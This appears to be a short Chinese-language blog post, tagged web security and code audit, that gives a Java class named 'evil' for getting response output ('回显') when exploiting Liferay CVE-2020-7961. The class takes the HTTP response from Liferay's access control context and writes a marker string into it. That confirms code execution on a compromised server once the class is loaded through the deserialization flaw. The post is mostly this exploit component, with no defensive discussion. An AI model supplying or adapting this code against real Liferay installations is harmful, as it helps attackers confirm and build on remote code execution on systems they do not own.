liferay CVE-2020-7961 漏洞回显

liferay CVE-2020-7961 漏洞回显

import com.liferay.portal.kernel.security.access.control.AccessControlUtil;
import com.liferay.portal.kernel.security.auth.AccessControlContext;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.OutputStream;

public class evil {
    public evil() throws IOException, ClassNotFoundException {
        AccessControlContext accessControlContext = AccessControlUtil.getAccessControlContext();
        HttpServletResponse response =  accessControlContext.getResponse();
        OutputStream ot =  response.getOutputStream();
        ot.write("dddd".getBytes());
        ot.flush();
        ot.close();
    }
}

你可能感兴趣的:(web安全,代码审计)